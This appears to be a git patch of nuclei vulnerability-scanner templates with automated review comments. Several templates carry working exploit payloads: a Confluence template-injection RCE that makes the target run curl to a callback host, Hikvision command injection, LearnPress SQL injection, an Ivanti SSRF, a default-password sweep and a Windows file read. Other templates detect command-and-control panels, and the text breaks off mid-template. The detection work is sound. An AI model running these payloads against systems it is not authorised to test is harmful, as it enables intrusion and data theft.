From faebc1af6a1eacfe81139916ae4d71a56814265d Mon Sep 17 00:00:00 2001 
From: "[PDBot]" Date: Sat, 9 Mar 2024 14:23:42 +0000 Subject: [PATCH 01/13] Adding new templates from Unreleased Templates Repo --- http/cves/2023/CVE-2023-22527.yaml | 37 ++-- http/cves/2023/CVE-2023-6114.yaml | 37 ++++ http/cves/2023/CVE-2023-6567.yaml | 33 ++++ http/cves/2023/CVE-2023-6895.yaml | 46 ++--- http/cves/2023/CVE-2024-21893.yaml | 45 +++++ .../ispconfig-default-login.yaml | 61 +++++++ http/exposed-panels/c2/ares-rat-c2.yaml | 33 ++++ http/exposed-panels/c2/caldera-c2.yaml | 32 ++++ http/exposed-panels/c2/hack5-cloud-c2.yaml | 31 ++++ http/exposed-panels/c2/pupyc2.yaml | 32 ++++ http/exposed-panels/c2/supershell-c2.yaml | 33 ++++ .../esafenet/esafenet-mysql-fileread.yaml | 36 ++++ .../idoc/idocview-2word-fileupload.yaml | 30 ++++ http/vulnerabilities/idoc/idocview-lfi.yaml | 37 ++++ .../other/office365-indexs-fileread.yaml | 36 ++++ javascript/audit/mysql/mysql-load-file.yaml | 51 ++++++ .../smb/pop3/pop3-capabilities-enum.yaml | 40 +++++ .../enumeration/smb/rsync/rsync-version.yaml | 29 ++++ .../enumeration/smb/smb-default-creds.yaml | 46 +++++ .../enumeration/smb/smb-enum-domains.yaml | 41 +++++ javascript/enumeration/smb/smb-os-detect.yaml | 158 ++++++++++++++++++ .../enumeration/smb/smb-version-detect.yaml | 28 ++++ javascript/mysql/mysql-db-enum.yaml | 44 +++++ javascript/mysql/mysql-default-login.yaml | 44 +++++ javascript/mysql/mysql-show-variables.yaml | 45 +++++ javascript/mysql/mysql-user-enum.yaml | 47 ++++++ .../network/mysql/mysql-empty-password.yaml | 41 +++++ .../network/mysql/mysql-show-databases.yaml | 45 +++++ javascript/network/redis/redis-info.yaml | 39 +++++ .../network/redis/redis-require-auth.yaml | 29 ++++ javascript/network/smb/smb2-server-time.yaml | 38 +++++ ssl/c2/venomrat.yaml | 26 +++ 32 files changed, 1304 insertions(+), 46 deletions(-) create mode 100644 http/cves/2023/CVE-2023-6114.yaml create mode 100644 http/cves/2023/CVE-2023-6567.yaml create mode 100644 http/cves/2023/CVE-2024-21893.yaml create mode 100644 
http/default-logins/ispconfig-default-login.yaml create mode 100644 http/exposed-panels/c2/ares-rat-c2.yaml create mode 100644 http/exposed-panels/c2/caldera-c2.yaml create mode 100644 http/exposed-panels/c2/hack5-cloud-c2.yaml create mode 100644 http/exposed-panels/c2/pupyc2.yaml create mode 100644 http/exposed-panels/c2/supershell-c2.yaml create mode 100644 http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml create mode 100644 http/vulnerabilities/idoc/idocview-2word-fileupload.yaml create mode 100644 http/vulnerabilities/idoc/idocview-lfi.yaml create mode 100644 http/vulnerabilities/other/office365-indexs-fileread.yaml create mode 100644 javascript/audit/mysql/mysql-load-file.yaml create mode 100644 javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml create mode 100644 javascript/enumeration/smb/rsync/rsync-version.yaml create mode 100644 javascript/enumeration/smb/smb-default-creds.yaml create mode 100644 javascript/enumeration/smb/smb-enum-domains.yaml create mode 100644 javascript/enumeration/smb/smb-os-detect.yaml create mode 100644 javascript/enumeration/smb/smb-version-detect.yaml create mode 100644 javascript/mysql/mysql-db-enum.yaml create mode 100644 javascript/mysql/mysql-default-login.yaml create mode 100644 javascript/mysql/mysql-show-variables.yaml create mode 100644 javascript/mysql/mysql-user-enum.yaml create mode 100644 javascript/network/mysql/mysql-empty-password.yaml create mode 100644 javascript/network/mysql/mysql-show-databases.yaml create mode 100644 javascript/network/redis/redis-info.yaml create mode 100644 javascript/network/redis/redis-require-auth.yaml create mode 100644 javascript/network/smb/smb2-server-time.yaml create mode 100644 ssl/c2/venomrat.yaml diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index d7d025c7bf..bcce43b020 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml 
@@ -1,29 +1,21 @@ id: CVE-2023-22527 info: - name: Atlassian Confluence - Remote Code Execution + name: Atlassian Confluence Unauthenticted Remote Code Execution author: iamnooob,rootxharsh,pdresearch severity: critical - description: | - A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. - Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. + description: |- + A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. 
reference: - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615 - https://jira.atlassian.com/browse/CONFSERVER-93833 - - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-22527 epss-score: 0.00044 - epss-percentile: 0.08115 - cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: atlassian - product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2023,confluence,rce,ssti + epss-percentile: 0.08185 + tags: cve,cve2023,confluence http: - raw: 
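Review bot: The new `info` block drops the `cpe` line and the whole `metadata` entry (`max-request`, `vendor`, `product`, `shodan-query`) plus the `rce,ssti` tags, while every other CVE template in this patch keeps those fields; that makes the template invisible to tag filters for RCE/SSTI and leaves its request budget undocumented, so keep `cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*` and `tags: cve,cve2023,confluence,rce,ssti` unless there is a stated reason to remove them. `name:` has a typo: `Unauthenticted` should be `Unauthenticated`. The author handle is spelled `iamnooob` here but `iamnoooob` in CVE-2023-6567 in the same patch; one of the two is presumably wrong.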
@@ -31,19 +23,18 @@ http: POST /template/aui/text-inline.vm HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate, br + Accept: */* Content-Type: application/x-www-form-urlencoded + Content-Length: 335 - label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"})) + label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"}) + matchers-condition: and matchers: + - type: word + part: body + words: + - 'Empty{name=' - type: dsl dsl: - - x_vuln_check != "" # check for custom header key exists - - contains(to_lower(body), 'empty{name=') - condition: and - - extractors: - - type: dsl - dsl: - - x_vuln_check # prints the output of whoami -# digest: 4b0a00483046022100cad74b2de250961c24ea16a5b8ed5cf9c1b4fa29b81cbfca33f3b72f5a4474c5022100c501f652babe15618734328d07936a3c399f964dfc0a67db2a8a61dd9e20a6ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "contains(interactsh_protocol, 'dns')" diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml new file mode 100644 index 0000000000..cf5fc0bef7 --- /dev/null +++ b/http/cves/2023/CVE-2023-6114.yaml 
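Review bot: The added `Content-Length: 335` header cannot be correct for every run, because the body beneath it embeds `{{interactsh-url}}`, whose expanded length differs per target and per session; if nuclei recomputes the length for raw requests the line is dead text, and if it does not the header is wrong, so removing it is the safer choice either way. The matcher rewrite now requires both the `Empty{name=` body string and a DNS interaction under `matchers-condition: and`, which is a sound two-signal design; a short comment such as `# body string shows the template was rendered; DNS callback confirms evaluation` would record that intent for the next maintainer. The removed `# digest:` trailer is regenerated by tooling and needs no action.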
@@ -0,0 +1,37 @@ +id: CVE-2023-6114 + +info: + name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure + author: DhiyaneshDk + severity: high + description: | + The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site. + remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2. + reference: + - https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing + - https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1 + - https://nvd.nist.gov/vuln/detail/CVE-2023-6114 + - https://wpscan.com/plugin/duplicator/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-6114 + cwe-id: CWE-552 + epss-score: 0.00145 + epss-percentile: 0.50326 + cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:* + tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/backups-dup-lite/tmp/" + - "{{BaseURL}}/wp-content/backups-dup-pro/tmp/" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(body, '/tmp') && contains(body, 'Index of')" + condition: and diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml new file mode 100644 index 0000000000..f9e5eaf434 --- /dev/null +++ b/http/cves/2023/CVE-2023-6567.yaml 
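Review bot: The `lfi` tag misclassifies this template: the finding is a directory listing that exposes backup files (the classification already records CWE-552), not a file inclusion, so `tags: cve,cve2023,duplicator,duplicator-pro,exposure,wpscan,wordpress,wp-plugin,wp` fits better. `remediation:` is missing a space after the comma (`... Fixed in 1.5.7.1, Duplicator-Pro Fixed in 4.5.14.2.`). The `metadata` block present in the other new templates is absent; with two paths it should carry `max-request: 2`. The first `reference` is a Google Drive share link, which is not a durable citation; the wpscan and NVD entries that follow it are sufficient.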
@@ -0,0 +1,33 @@ +id: CVE-2023-6567 + +info: + name: LearnPress <= 4.2.5.7 - SQL Injection + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in version 4.2.5.8 + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by + - https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-6567 + classification: + cve-id: CVE-2023-6567 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/learnpress" + tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1" + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains_all(header, "lp_session_guest=", "application/json")' + - 'contains_all(body, "status\":\"success", "No courses were found")' + condition: and diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index b1fdac14f0..ae97042eb3 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml 
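Review bot: `classification` carries only `cve-id`, while the other CVE templates in this patch also record `cvss-metrics`, `cvss-score` and `cwe-id` (CWE-89 applies to SQL injection), and those fields feed severity reporting downstream. The `duration>=6` condition is a timing check paired with `SLEEP(6)`, which a slow host or proxy can satisfy on its own; the two `contains_all` conditions joined by `condition: and` are what keep it from being a pure timing match, and a comment saying so (`# header/body checks cut false positives from slow responses`) would make that explicit. The `author` handle `iamnoooob` differs from `iamnooob` in CVE-2023-22527 in this same patch.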
@@ -1,24 +1,20 @@ id: CVE-2023-6895 info: - name: Hikvision Intercom Broadcasting System - Command Execution - author: archer + name: Hikvision IP ping.php - Command Execution + author: DhiyaneshDk severity: critical - description: | - Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection. + description: A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. reference: - - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py - https://vuldb.com/?ctiid.248254 - https://vuldb.com/?id.248254 - - https://github.com/Marco-zcl/POC - - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6895 cwe-id: CWE-78 epss-score: 0.0008 - epss-percentile: 0.32716 + epss-percentile: 0.33389 cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:* metadata: verified: true 
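Review bot: The new `name: Hikvision IP ping.php - Command Execution` is less informative than the product name it replaces and no longer agrees with the `cpe` value (`intercom_broadcast_system`) further down; `name: Hikvision Intercom Broadcasting System - OS Command Injection` keeps the product and matches `cwe-id: CWE-78`. The rewritten `description` is one very long plain scalar in VulDB's auto-generated phrasing ("It has been declared as critical", "VDB-248254 is the identifier assigned"); the earlier `description: |` block form read better and kept lines short. The upgrade-to-4.1.0 detail now lives only inside that prose; a structured `remediation: Upgrade to version 4.1.0 or later` line, as CVE-2023-6114 in this patch does, would surface it to tooling.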
@@ -26,31 +22,35 @@ info: vendor: hikvision product: intercom_broadcast_system fofa-query: icon_hash="-1830859634" - tags: cve,cve2023,rce,hikvision + tags: cve,cve2023,hikvision,rce http: - - raw: - - | - POST /php/ping.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest + - method: POST + path: + - "{{BaseURL}}/php/ping.php" + body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}" + headers: + Content-Type: "application/x-www-form-urlencoded" - jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}} + payloads: + command: + - 'id' + - 'cmd /c ipconfig' matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "dns" + - type: regex + part: body + regex: + - "Windows IP" + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" + condition: or - type: word - part: body + part: header words: - - "TTL=" + - "text/html" - type: status status: - 200 -# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2024-21893.yaml b/http/cves/2023/CVE-2024-21893.yaml new file mode 100644 index 0000000000..d58f98dc69 --- /dev/null +++ b/http/cves/2023/CVE-2024-21893.yaml 
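Review bot: The request now iterates two `command` payloads, so a `metadata.max-request` value, which would sit above this hunk if present, should read `2` rather than `1`. Because the template now runs commands on the target and matches their output in the body, instead of only observing a callback as the removed version did, the `tags` line should include `intrusive` next to `rce` so users who exclude intrusive checks are not surprised. Quoting is inconsistent within the hunk: the `body` and `Content-Type` values are double-quoted while the payload list uses single quotes; pick one style.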
@@ -0,0 +1,45 @@ +id: CVE-2024-21893 + +info: + name: Ivanti SAML - Server Side Request Forgery (SSRF) + author: DhiyaneshDk + severity: high + description: | + A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. + reference: + - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis + - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two + - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N + cvss-score: 8.2 + cve-id: CVE-2024-21893 + cwe-id: CWE-918 + cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:* + metadata: + vendor: ivanti + product: connect_secure + shodan-query: "html:\"welcome.cgi?p=logo\"" + tags: cve,cve2024,kev,ssrf,ivanti + +http: + - raw: + - | + POST /dana-ws/saml20.ws HTTP/1.1 + Host: {{Hostname}} + + <?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope> + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: word + part: body + words: + - '/dana-na/' + 
- 'WriteCSS' + condition: and diff --git a/http/default-logins/ispconfig-default-login.yaml b/http/default-logins/ispconfig-default-login.yaml new file mode 100644 index 0000000000..e3cf05065c --- /dev/null +++ b/http/default-logins/ispconfig-default-login.yaml @@ -0,0 +1,61 @@ +id: ispconfig-default-login + +info: + name: ISPConfig - Default Password + author: pussycat0x + severity: high + description: | + ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + shodan-query: http.title:"ispconfig" + tags: default-login,ispconfig + +http: + - raw: + - | + GET /lgoin HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Connection: close + Referer: {{RootURL}}/login/ + + username={{username}}&password={{password}}&s_mod=login&s_pg=index + + - | + GET /sites/web_vhost_domain_list.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}}/index.php + + attack: pitchfork + payloads: + username: + - 'admin' + - 'guest' + - 'root' + password: + - 'admin' + - 'password' + - 'toor' + + stop-at-first-match: true + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - Tools + - Websites + condition: and + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml new file mode 100644 index 0000000000..60ae43df94 --- /dev/null +++ b/http/exposed-panels/c2/ares-rat-c2.yaml 
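Review bot: The file is created at `http/cves/2023/CVE-2024-21893.yaml` although both `cve-id` and the `cve2024` tag say 2024, so the year-directory convention (and any tooling that derives the year from the path) is broken; move it to `http/cves/2024/CVE-2024-21893.yaml`. `metadata` lacks `max-request: 1`, which the other templates in this patch supply. The second word matcher's `condition: and` applies only to its own `words` list while `matchers-condition: and` already joins it with the interactsh check; that is correct, but a comment distinguishing the two levels would prevent someone from "simplifying" it away.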
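Review bot: The first raw request fetches `/lgoin`, which looks like a typo for `/login` given the `Referer: {{RootURL}}/login/` used two requests later; if it is deliberate (for example to obtain a session cookie from an error page) a comment should say so. `metadata` has no `max-request`; with `attack: pitchfork` over three credential pairs and three requests per pair the budget is `max-request: 9`. `Origin: {{BaseURL}}` and `Referer: {{RootURL}}/...` mix two base-URL variables in one request; use one consistently.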
@@ -0,0 +1,33 @@ +id: ares-rat-c2 + +info: + name: Area Rat C2 - Detect + author: pussycat0x + severity: info + description: | + Ares is a Python Remote Access Tool. + reference: + - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py + metadata: + verified: true + max-request: 1 + shodan-query: product:'Ares RAT C2' + tags: c2,ir,osint,ares,panel,rat + +http: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>Ares' + - 'Passphrase:' + condition: and + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml new file mode 100644 index 0000000000..d2e0c7a0cb --- /dev/null +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -0,0 +1,32 @@ +id: caldera-c2 + +info: + name: Caldera C2 - Detect + author: pussycat0x + severity: info + description: | + MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response. + reference: + - https://github.com/mitre/caldera + - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py + metadata: + verified: true + max-request: 1 + fofa-query: http.favicon.hash:-636718605 + tags: c2,ir,osint,caldera,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Login | CALDERA' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml new file mode 100644 index 0000000000..e40038d588 --- /dev/null +++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml 
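Review bot: `name: Area Rat C2 - Detect` misspells the product; the id, tag and description all say Ares, so `name: Ares RAT C2 - Detect` is the consistent form. `shodan-query: product:'Ares RAT C2'` embeds single quotes in a plain scalar, which parses but is fragile to reformatting; `shodan-query: "product:'Ares RAT C2'"` is safer. A sentence in `description` naming the matched strings (`<title>Ares` and `Passphrase:` on `/login`) would let a maintainer refresh the matcher when the panel changes.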
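Review bot: The `fofa-query` value `http.favicon.hash:-636718605` is written in Shodan's filter syntax rather than FOFA's (`icon_hash="..."`, as the Supershell template in this patch uses), so either the key or the value is wrong; if this is a Shodan search, rename the key to `shodan-query`. The `description` contains a `™` character, which is valid UTF-8 but out of step with the other descriptions; plain `MITRE Caldera` is enough. The title-based matcher `Login | CALDERA` is a reasonable signal for an `info`-severity panel detection.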
@@ -0,0 +1,31 @@ +id: hack5-cloud-c2 + +info: + name: Hack5 Cloud C2 - Detect + author: pussycat0x + severity: info + description: | + Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere. Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients. + reference: + - https://twitter.com/fofabot/status/1742737671037091854 + metadata: + verified: true + max-request: 1 + fofa-query: app="Hak5-C2" + tags: c2,ir,osint,hack5c2,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Hak5 Cloud C²' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml new file mode 100644 index 0000000000..b4194d8f88 --- /dev/null +++ b/http/exposed-panels/c2/pupyc2.yaml @@ -0,0 +1,32 @@ +id: pupyc2 + +info: + name: PupyC2 - Detect + author: pussycat0x + severity: info + description: | + Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory. + reference: + - https://twitter.com/TLP_R3D/status/1654038602282565632 + - https://github.com/n1nj4sec/pupy + metadata: + verified: true + max-request: 1 + shodan-query: aa3939fc357723135870d5036b12a67097b03309 + tags: c2,ir,osint,pupyc2,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Etag: "aa3939fc357723135870d5036b12a67097b03309"' + + - type: status + status: + - 200 
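Review bot: The vendor is spelled `Hak5` in the description, the `fofa-query` and the matcher, but `Hack5` in `name`, in the `id` and in the `hack5c2` tag; since the id is also the filename, settling on `hak5-cloud-c2` / `Hak5 Cloud C2 - Detect` / tag `hak5c2` before merge avoids a rename later. The matcher word `Hak5 Cloud C²` contains a non-ASCII superscript, which is fine in UTF-8 YAML but deserves a comment noting that the page text is matched verbatim, so an ASCII `C2` rendering of the title would not hit.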
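Review bot: `shodan-query` holds a bare hash value rather than a Shodan filter expression, so it is not a usable query; write it in Shodan's filter syntax or drop the key. The header matcher looks for the literal `Etag: "..."` with that exact capitalisation; whether nuclei's `header` part keeps the server's casing or canonicalises header names should be confirmed, and adding `case-insensitive: true` to the matcher makes it robust either way. A `description` sentence stating that the ETag is the panel's static-asset fingerprint would explain why a header, not the body, is matched.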
diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml new file mode 100644 index 0000000000..131e9e2d39 --- /dev/null +++ b/http/exposed-panels/c2/supershell-c2.yaml @@ -0,0 +1,33 @@ +id: supershell-c2 + +info: + name: Supershell C2 - Detect + author: pussycat0x + severity: info + description: | + Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel, a fully interactive shell can be obtained, and it supports multi-platform architecture Payload. + reference: + - https://twitter.com/S4nsLimit3/status/1693619836339859497 + - https://github.com/tdragon6/Supershell/blob/main/README_EN.md + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="-1010228102" + tags: c2,ir,osint,supershell,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Supershell - 登录' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml new file mode 100644 index 0000000000..5d92c138af --- /dev/null +++ b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml @@ -0,0 +1,36 @@ +id: esafenet-mysql-fileread + +info: + name: Esafenet CDG mysql - File Read + author: DhiyaneshDk + severity: high + description: | + CDGServer3 Unauthorized File Download vulnerability is detected. + metadata: + verified: true + max-request: 1 + fofa-query: title="电子文档安全管理系统" + tags: esafenet,lfi,mysql + +http: + - method: GET + path: + - "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "varchar" + - "create table" + condition: and + + - type: word + part: header + words: + - "application/x-sql" + + - type: status + status: + - 200 
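Review bot: The `lfi` tag and the `File Read` name overstate what is matched: the request fetches one fixed static path (`create_SmartSec_mysql.sql`) and checks for schema DDL, which is an exposed-file disclosure rather than an arbitrary file read, so `tags: esafenet,exposure,mysql` and a name such as `Esafenet CDG - MySQL Schema File Exposure` describe it accurately. The `description` is a single vague sentence; saying which file is exposed and that it contains database schema DDL would let a reader judge whether `high` severity is warranted for a schema script. No `reference` is given, unlike the rest of this patch.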
diff --git a/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml b/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml new file mode 100644 index 0000000000..28fdcefb12 --- /dev/null +++ b/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml @@ -0,0 +1,30 @@ +id: idocview-2word-fileupload + +info: + name: IDoc View /html/2word - Arbitrary File Upload + author: DhiyaneshDK + severity: high + metadata: + verified: true + max-request: 1 + fofa-query: title=="在线文档预览 - I Doc View" + tags: idoc,rce,instrusive,file-upload + +variables: + file: "{{to_lower(rand_text_alpha(5))}}" + +http: + - method: GET + path: + - "{{BaseURL}}/html/2word?url={{file}}" + + matchers-condition: and + matchers: + - type: word + part: response + words: + - "{{md5(file)}}.docx" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/idoc/idocview-lfi.yaml b/http/vulnerabilities/idoc/idocview-lfi.yaml new file mode 100644 index 0000000000..12ac44a85d --- /dev/null +++ b/http/vulnerabilities/idoc/idocview-lfi.yaml @@ -0,0 +1,37 @@ +id: idocview-lfi + +info: + name: IDoc View - Arbitrary File Read + author: DhiyaneshDK + severity: high + metadata: + verified: true + max-request: 1 + fofa-query: title=="在线文档预览 - I Doc View" + tags: idoc,lfi,file-read + +variables: + file: "{{to_lower(rand_text_alpha(5))}}" + +http: + + - method: GET + path: + - "{{BaseURL}}/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt" + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(content_type, 'application/json') + - contains_all(body, "ext", "srcUrl", "success", "md5") + condition: and + + extractors: + - type: regex + part: body + 